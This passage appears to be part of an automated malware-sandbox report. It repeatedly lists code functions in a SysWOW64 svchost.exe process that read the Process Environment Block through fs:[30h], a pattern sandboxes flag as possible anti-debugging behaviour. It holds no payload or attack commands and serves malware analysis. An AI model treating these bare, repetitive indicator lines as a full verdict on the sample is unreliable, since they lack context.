          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03537370 mov eax, dword ptr fs:[00000030h]19_2_03537370
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EF367 mov eax, dword ptr fs:[00000030h]19_2_035EF367
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352C310 mov ecx, dword ptr fs:[00000030h]19_2_0352C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03550310 mov ecx, dword ptr fs:[00000030h]19_2_03550310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B930B mov eax, dword ptr fs:[00000030h]19_2_035B930B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B930B mov eax, dword ptr fs:[00000030h]19_2_035B930B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B930B mov eax, dword ptr fs:[00000030h]19_2_035B930B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356A30B mov eax, dword ptr fs:[00000030h]19_2_0356A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356A30B mov eax, dword ptr fs:[00000030h]19_2_0356A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356A30B mov eax, dword ptr fs:[00000030h]19_2_0356A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03527330 mov eax, dword ptr fs:[00000030h]19_2_03527330
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F132D mov eax, dword ptr fs:[00000030h]19_2_035F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F132D mov eax, dword ptr fs:[00000030h]19_2_035F132D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355F32A mov eax, dword ptr fs:[00000030h]19_2_0355F32A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EB3D0 mov ecx, dword ptr fs:[00000030h]19_2_035EB3D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EC3CD mov eax, dword ptr fs:[00000030h]19_2_035EC3CD
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353A3C0 mov eax, dword ptr fs:[00000030h]19_2_0353A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353A3C0 mov eax, dword ptr fs:[00000030h]19_2_0353A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353A3C0 mov eax, dword ptr fs:[00000030h]19_2_0353A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353A3C0 mov eax, dword ptr fs:[00000030h]19_2_0353A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353A3C0 mov eax, dword ptr fs:[00000030h]19_2_0353A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353A3C0 mov eax, dword ptr fs:[00000030h]19_2_0353A3C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035383C0 mov eax, dword ptr fs:[00000030h]19_2_035383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035383C0 mov eax, dword ptr fs:[00000030h]19_2_035383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035383C0 mov eax, dword ptr fs:[00000030h]19_2_035383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035383C0 mov eax, dword ptr fs:[00000030h]19_2_035383C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_036053FC mov eax, dword ptr fs:[00000030h]19_2_036053FC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354E3F0 mov eax, dword ptr fs:[00000030h]19_2_0354E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354E3F0 mov eax, dword ptr fs:[00000030h]19_2_0354E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0354E3F0 mov eax, dword ptr fs:[00000030h]19_2_0354E3F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035663FF mov eax, dword ptr fs:[00000030h]19_2_035663FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EF3E6 mov eax, dword ptr fs:[00000030h]19_2_035EF3E6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035403E9 mov eax, dword ptr fs:[00000030h]19_2_035403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035403E9 mov eax, dword ptr fs:[00000030h]19_2_035403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035403E9 mov eax, dword ptr fs:[00000030h]19_2_035403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035403E9 mov eax, dword ptr fs:[00000030h]19_2_035403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035403E9 mov eax, dword ptr fs:[00000030h]19_2_035403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035403E9 mov eax, dword ptr fs:[00000030h]19_2_035403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035403E9 mov eax, dword ptr fs:[00000030h]19_2_035403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035403E9 mov eax, dword ptr fs:[00000030h]19_2_035403E9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0358739A mov eax, dword ptr fs:[00000030h]19_2_0358739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0358739A mov eax, dword ptr fs:[00000030h]19_2_0358739A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03528397 mov eax, dword ptr fs:[00000030h]19_2_03528397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03528397 mov eax, dword ptr fs:[00000030h]19_2_03528397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03528397 mov eax, dword ptr fs:[00000030h]19_2_03528397
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352E388 mov eax, dword ptr fs:[00000030h]19_2_0352E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352E388 mov eax, dword ptr fs:[00000030h]19_2_0352E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352E388 mov eax, dword ptr fs:[00000030h]19_2_0352E388
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355438F mov eax, dword ptr fs:[00000030h]19_2_0355438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355438F mov eax, dword ptr fs:[00000030h]19_2_0355438F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035533A5 mov eax, dword ptr fs:[00000030h]19_2_035533A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035633A0 mov eax, dword ptr fs:[00000030h]19_2_035633A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035633A0 mov eax, dword ptr fs:[00000030h]19_2_035633A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0360539D mov eax, dword ptr fs:[00000030h]19_2_0360539D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352A250 mov eax, dword ptr fs:[00000030h]19_2_0352A250
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EB256 mov eax, dword ptr fs:[00000030h]19_2_035EB256
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EB256 mov eax, dword ptr fs:[00000030h]19_2_035EB256
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03536259 mov eax, dword ptr fs:[00000030h]19_2_03536259
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03529240 mov eax, dword ptr fs:[00000030h]19_2_03529240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03529240 mov eax, dword ptr fs:[00000030h]19_2_03529240
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356724D mov eax, dword ptr fs:[00000030h]19_2_0356724D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03559274 mov eax, dword ptr fs:[00000030h]19_2_03559274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03571270 mov eax, dword ptr fs:[00000030h]19_2_03571270
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03571270 mov eax, dword ptr fs:[00000030h]19_2_03571270
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E0274 mov eax, dword ptr fs:[00000030h]19_2_035E0274
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03534260 mov eax, dword ptr fs:[00000030h]19_2_03534260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03534260 mov eax, dword ptr fs:[00000030h]19_2_03534260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03534260 mov eax, dword ptr fs:[00000030h]19_2_03534260
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FD26B mov eax, dword ptr fs:[00000030h]19_2_035FD26B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035FD26B mov eax, dword ptr fs:[00000030h]19_2_035FD26B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352826B mov eax, dword ptr fs:[00000030h]19_2_0352826B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03605227 mov eax, dword ptr fs:[00000030h]19_2_03605227
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03567208 mov eax, dword ptr fs:[00000030h]19_2_03567208
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03567208 mov eax, dword ptr fs:[00000030h]19_2_03567208
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352823B mov eax, dword ptr fs:[00000030h]19_2_0352823B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352B2D3 mov eax, dword ptr fs:[00000030h]19_2_0352B2D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352B2D3 mov eax, dword ptr fs:[00000030h]19_2_0352B2D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352B2D3 mov eax, dword ptr fs:[00000030h]19_2_0352B2D3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_036052E2 mov eax, dword ptr fs:[00000030h]19_2_036052E2
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355F2D0 mov eax, dword ptr fs:[00000030h]19_2_0355F2D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355F2D0 mov eax, dword ptr fs:[00000030h]19_2_0355F2D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353A2C3 mov eax, dword ptr fs:[00000030h]19_2_0353A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353A2C3 mov eax, dword ptr fs:[00000030h]19_2_0353A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353A2C3 mov eax, dword ptr fs:[00000030h]19_2_0353A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353A2C3 mov eax, dword ptr fs:[00000030h]19_2_0353A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0353A2C3 mov eax, dword ptr fs:[00000030h]19_2_0353A2C3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355B2C0 mov eax, dword ptr fs:[00000030h]19_2_0355B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355B2C0 mov eax, dword ptr fs:[00000030h]19_2_0355B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355B2C0 mov eax, dword ptr fs:[00000030h]19_2_0355B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355B2C0 mov eax, dword ptr fs:[00000030h]19_2_0355B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355B2C0 mov eax, dword ptr fs:[00000030h]19_2_0355B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355B2C0 mov eax, dword ptr fs:[00000030h]19_2_0355B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0355B2C0 mov eax, dword ptr fs:[00000030h]19_2_0355B2C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035392C5 mov eax, dword ptr fs:[00000030h]19_2_035392C5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035392C5 mov eax, dword ptr fs:[00000030h]19_2_035392C5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035EF2F8 mov eax, dword ptr fs:[00000030h]19_2_035EF2F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035292FF mov eax, dword ptr fs:[00000030h]19_2_035292FF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035E12ED mov eax, dword ptr fs:[00000030h]19_2_035E12ED
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035402E1 mov eax, dword ptr fs:[00000030h]19_2_035402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035402E1 mov eax, dword ptr fs:[00000030h]19_2_035402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035402E1 mov eax, dword ptr fs:[00000030h]19_2_035402E1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356329E mov eax, dword ptr fs:[00000030h]19_2_0356329E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356329E mov eax, dword ptr fs:[00000030h]19_2_0356329E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356E284 mov eax, dword ptr fs:[00000030h]19_2_0356E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0356E284 mov eax, dword ptr fs:[00000030h]19_2_0356E284
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B0283 mov eax, dword ptr fs:[00000030h]19_2_035B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B0283 mov eax, dword ptr fs:[00000030h]19_2_035B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B0283 mov eax, dword ptr fs:[00000030h]19_2_035B0283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03605283 mov eax, dword ptr fs:[00000030h]19_2_03605283
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B92BC mov eax, dword ptr fs:[00000030h]19_2_035B92BC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B92BC mov eax, dword ptr fs:[00000030h]19_2_035B92BC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B92BC mov ecx, dword ptr fs:[00000030h]19_2_035B92BC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035B92BC mov ecx, dword ptr fs:[00000030h]19_2_035B92BC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035402A0 mov eax, dword ptr fs:[00000030h]19_2_035402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035402A0 mov eax, dword ptr fs:[00000030h]19_2_035402A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035452A0 mov eax, dword ptr fs:[00000030h]19_2_035452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035452A0 mov eax, dword ptr fs:[00000030h]19_2_035452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035452A0 mov eax, dword ptr fs:[00000030h]19_2_035452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035452A0 mov eax, dword ptr fs:[00000030h]19_2_035452A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F92A6 mov eax, dword ptr fs:[00000030h]19_2_035F92A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F92A6 mov eax, dword ptr fs:[00000030h]19_2_035F92A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F92A6 mov eax, dword ptr fs:[00000030h]19_2_035F92A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F92A6 mov eax, dword ptr fs:[00000030h]19_2_035F92A6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C62A0 mov eax, dword ptr fs:[00000030h]19_2_035C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C62A0 mov ecx, dword ptr fs:[00000030h]19_2_035C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C62A0 mov eax, dword ptr fs:[00000030h]19_2_035C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C62A0 mov eax, dword ptr fs:[00000030h]19_2_035C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C62A0 mov eax, dword ptr fs:[00000030h]19_2_035C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C62A0 mov eax, dword ptr fs:[00000030h]19_2_035C62A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C72A0 mov eax, dword ptr fs:[00000030h]19_2_035C72A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C72A0 mov eax, dword ptr fs:[00000030h]19_2_035C72A0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03537152 mov eax, dword ptr fs:[00000030h]19_2_03537152
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352C156 mov eax, dword ptr fs:[00000030h]19_2_0352C156
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03536154 mov eax, dword ptr fs:[00000030h]19_2_03536154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03536154 mov eax, dword ptr fs:[00000030h]19_2_03536154
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C4144 mov eax, dword ptr fs:[00000030h]19_2_035C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C4144 mov eax, dword ptr fs:[00000030h]19_2_035C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C4144 mov ecx, dword ptr fs:[00000030h]19_2_035C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C4144 mov eax, dword ptr fs:[00000030h]19_2_035C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C4144 mov eax, dword ptr fs:[00000030h]19_2_035C4144
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03529148 mov eax, dword ptr fs:[00000030h]19_2_03529148
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03529148 mov eax, dword ptr fs:[00000030h]19_2_03529148
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03529148 mov eax, dword ptr fs:[00000030h]19_2_03529148
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03529148 mov eax, dword ptr fs:[00000030h]19_2_03529148
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352F172 mov eax, dword ptr fs:[00000030h]19_2_0352F172
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035C9179 mov eax, dword ptr fs:[00000030h]19_2_035C9179
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03605152 mov eax, dword ptr fs:[00000030h]19_2_03605152
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035DA118 mov ecx, dword ptr fs:[00000030h]19_2_035DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035DA118 mov eax, dword ptr fs:[00000030h]19_2_035DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035DA118 mov eax, dword ptr fs:[00000030h]19_2_035DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035DA118 mov eax, dword ptr fs:[00000030h]19_2_035DA118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_035F0115 mov eax, dword ptr fs:[00000030h]19_2_035F0115
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03531131 mov eax, dword ptr fs:[00000030h]19_2_03531131
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_03531131 mov eax, dword ptr fs:[00000030h]19_2_03531131
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352B136 mov eax, dword ptr fs:[00000030h]19_2_0352B136
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352B136 mov eax, dword ptr fs:[00000030h]19_2_0352B136
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352B136 mov eax, dword ptr fs:[00000030h]19_2_0352B136
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 19_2_0352B136 mov eax, dword ptr fs:[00000030h]19_2_0352B136
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_03560124 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_036061E5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0356D1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_0356D1D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035AE1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035AE1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035AE1D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035AE1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035AE1D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035F61C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035F61C3 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_036051CB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035601F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035551EF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 19_2_035351ED mov eax, dword ptr fs:[00000030h]
